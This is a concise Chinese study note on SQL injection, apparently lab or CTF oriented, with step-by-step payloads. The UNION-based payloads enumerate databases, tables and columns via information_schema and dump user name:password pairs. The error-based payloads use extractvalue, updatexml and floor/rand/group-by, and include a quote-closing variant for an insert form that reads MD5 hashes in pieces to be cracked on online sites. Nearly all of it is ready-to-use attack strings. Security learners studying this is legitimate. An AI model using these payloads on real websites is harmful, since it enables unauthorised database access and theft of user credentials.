SQL 注入笔记(Union + 报错注入・精简版)
一、Union 注入实操
1. 判断注入点
- 改变 id 显示不同数据
- 输入特殊字符 / 乱码报错
- 示例:
id=1、id=2、id=啊
2. order by 查字段数
plaintext
id=1 order by 1 id=1 order by 2 id=1 order by 3 id=1 order by 4 id=1 order by 5 # 报错→ 字段数为4
3. 判断回显位置
plaintext
id=-1 union select 1,2,3,4id=-1让原查询无结果看到页面回显2、3、4,这些位置可放注入语句
4. 查数据库名
plaintext
id=-1 union select 1,2,version(),database()5. 查所有库名
plaintext
id=-1 union select 1,2,version(),group_concat(schema_name) from information_schema.schemata6. 查表名(已知库名 jrlt)
plaintext
id=-1 union select 1,2,version(),group_concat(table_name) from information_schema.tables where table_schema='jrlt'7. 查字段名(表 users)
plaintext
id=-1 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='jrlt'8. 查数据(账号密码)
plaintext
id=-5 union select 1,2,3,concat(name,':',password) from users limit 0,1得到 MD5 密文,去 cmd5 等网站解密
二、报错注入
1. 适用场景
- Union 无法使用
- 页面显示数据库报错信息
2. 常用报错语句
(1)extractvalue 报错
plaintext
id=1 and extractvalue(1, concat(0x5c, (select database()), 0x5c))(2)updatexml 报错
plaintext
id=1 and updatexml(1, concat(0x5e, (select database()), 0x5e), 1)(3)group by 重复键报错(floor/rand/count)
plaintext
1 and (select 1 from (select count(*),concat(0x5e,(select version()),0x5e,floor(rand(0)*2))x from information_schema.tables group by x)a)3. 报错注入实战(insert 留言场景)
闭合单引号,构造:
plaintext
' or 报错语句 or '(1)查库名
plaintext
' or (select 1 from (select count(*),concat(0x5e,database(),0x5e,floor(rand(0)*2))x from information_schema.tables group by x)a) or '(2)查表名
plaintext
' or extractvalue(1, concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema='jrlt'),0x5c)) or '(3)查字段名
plaintext
' or updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='jrlt'),0x5e),1) or '(4)查数据(updatexml 长度限制 32 位,分段读取)
plaintext
' or updatexml(1,concat(0x5e,(select concat(name,':',substring(password,1,16)) from users limit 0,1),0x5e),1) or ' ' or updatexml(1,concat(0x5e,(select concat(name,':',substring(password,17)) from users limit 0,1),0x5e),1) or '拼接后解密 MD5。
三、注入流程速记
- 找注入点
order by查字段数union select找回显位- 查库 → 查表 → 查字段 → 查数据
- Union 不行 → 用报错注入